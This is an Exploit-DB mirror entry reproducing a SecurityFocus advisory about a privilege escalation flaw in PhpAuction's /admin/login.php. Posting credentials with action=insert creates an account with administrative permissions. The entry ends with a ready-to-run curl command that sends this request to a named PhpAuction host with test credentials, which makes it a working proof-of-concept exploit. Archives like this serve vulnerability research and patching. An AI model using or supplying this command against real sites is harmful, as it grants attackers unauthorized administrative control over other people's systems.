exploit-db-mirror/platforms/php/webapps/21590.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

9 lines
No EOL
534 B
Text
Executable file

source: http://www.securityfocus.com/bid/5141/info
PhpAuction is a freely available web-based auction system. It is written using PHP scripting language on a MySQL database engine.
A flaw in /admin/login.php has been reported in PHPAuction, which could allow users to gain escalated privileges.
Submitting authentication credentials via login.php will create the user account with adminsitrative permissions.
curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"